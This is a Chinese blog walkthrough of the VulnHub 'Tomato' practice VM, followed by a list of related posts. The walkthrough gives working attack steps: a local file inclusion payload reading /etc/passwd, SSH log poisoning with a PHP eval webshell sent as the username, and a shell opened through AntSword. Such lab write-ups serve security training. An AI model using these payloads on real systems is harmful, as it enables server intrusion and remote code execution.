TOMATO靶机漏洞复现

最新推荐文章于 2024-04-27 12:56:11 发布
最新推荐文章于 2024-04-27 12:56:11 发布
阅读量218 收藏
点赞数 2
分类专栏: tomato靶场 文章标签: ssh ubuntu 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/132092212
版权

搭建运行环境

环境下载

Tomato: 1 ~ VulnHub

环境启动

直接在VMware里面打开

设置为NAT模式

在kali进行IP扫描 arp-scan -l

IP 为192.168.182.154

信息收集

端口扫描

nmap -sV 192.168.184.154 可以看到开启了三个端口

目录扫描

dirsearch -u 192.168.184.154 看到只有一个页面

直接浏览器打开

访问8888端口,有一个登录

弱口令不行,,因为是弹窗不能爆破,,XSS不行,,XXE不行..试试其他

使用dirb再扫一下. dirb http://192.168.184.154

发现这个文件可以访问.

找到网站绝对路径 info.php

查看页面源代码 可以发现image的文件包含.

在URL后面输入 ?image=/etc/passwd 显示成功,说明存在文件包含漏洞

http://192.168.184.154/antibot_image/antibots/info.php?image=/etc/passwd

发现端口没有全部扫描出来

nmap -A 192.168.184.154 -p- 扫描出来2211 ssh的链接端口

我们直接进行报错连接 2211

ssh '<?php @eval($_POST[1]);?>'@192.168.184.154 -p 2211

然后在网页端查看ubantu报错信息

/var/log/auth.log

发现多了一些报错信息,大概率写入木马成功.

直接使用中国蚁剑进行连接:

连接成功,拿到shell了!

徐长卿学网安
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4309
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
VulnHub-Tomato靶机详细渗透过程
MRS_jianai的博客
12-21 1030
VulnHub-Tomato靶机详细渗透过程
Tomato靶机渗透
qq_44732584的博客
03-23 424
渗透测试
VulnHub渗透测试实战靶场 - Tomato
最新发布
m0_74215510的博客
04-27 1202
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 423
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
已饱和,未来程序员真没法再干了?_程序员干不了活(1),HarmonyOS鸿蒙 基础面试
2401_84181501的博客
04-15 344
是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
tomato固件
01-01
tomato-K26-1.28.20141211MIPSR2-Arctic-MultiWAN-Micro-NoUSB 亲测可用
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 966
Vulnhub-Tomato靶机实战
tomato-靶机渗透测试
m0_54323635的博客
10-09 184
tomato-靶机渗透测试
VulnHub渗透测试实战靶场 - Tomato:1
LYJ20010728的博客
08-19 1812
VulnHub渗透测试实战靶场 - Tomato:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.137 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-100
vlunhub之tomato
鲨鱼辣椒的博客
05-31 359
目录 信息搜集 扫描网段确定主机IP地址 ​扫描该IP地址开放端口以及服务 ​发现漏洞 利用IP地址登录 ​尝试扫描出的端口 爆破网站目录 发现敏感文件泄露 利用漏洞 尝试getsell 利用php反弹shell 权限提升 在该目录下开启http服务 在getshell里下载该文件 信息搜集 扫描网段确定主机IP地址 扫描该IP地址开放端口以及服务 nmap -A -p- 192.168.179.128 发现漏洞 利用IP地址登录 尝试扫描出的端口 只有88
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 193
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
vulnhub靶机渗透 Tomato
RestoreJustice的博客
03-19 367
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137。需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录,被记入日志。使用了第一个,失败了。
tomato靶机提权
FJawen的博客
05-26 546
tomato靶机提权信息收集利用漏洞权限提升 信息收集 1、 使用arp-scan -l 扫描本地局域网存活主机: 2、 Nmap扫描开放端口以及相关信息: 3、 访问http服务端口查看页面信息: 4、 没有相关可利用信息,继续访问8888端口http服务: 5、 利用dirb对站点目录进行爆破: 6、 发现其他站点并进行访问 7、 根据修改时间发现info.php文件最新更新,访问并查看源码: 发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd: 利用漏洞 已知inf
中国蚁剑 配置使用
Z_l123的博客
01-13 5857
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传至靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用"中国蚁剑"连接靶机上的 muma.php 1)打开中国蚁剑 2)在
d茅tection tomato
07-30
侦测番茄的方法有很多。首先,可以通过目视观察来检测番茄。我们可以观察番茄的形状、颜色和大小来确定它是否成熟或有任何瑕疵。这种方法虽然简单,但需要经验和专业知识。 其次,可以使用光谱分析技术来探测番茄。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值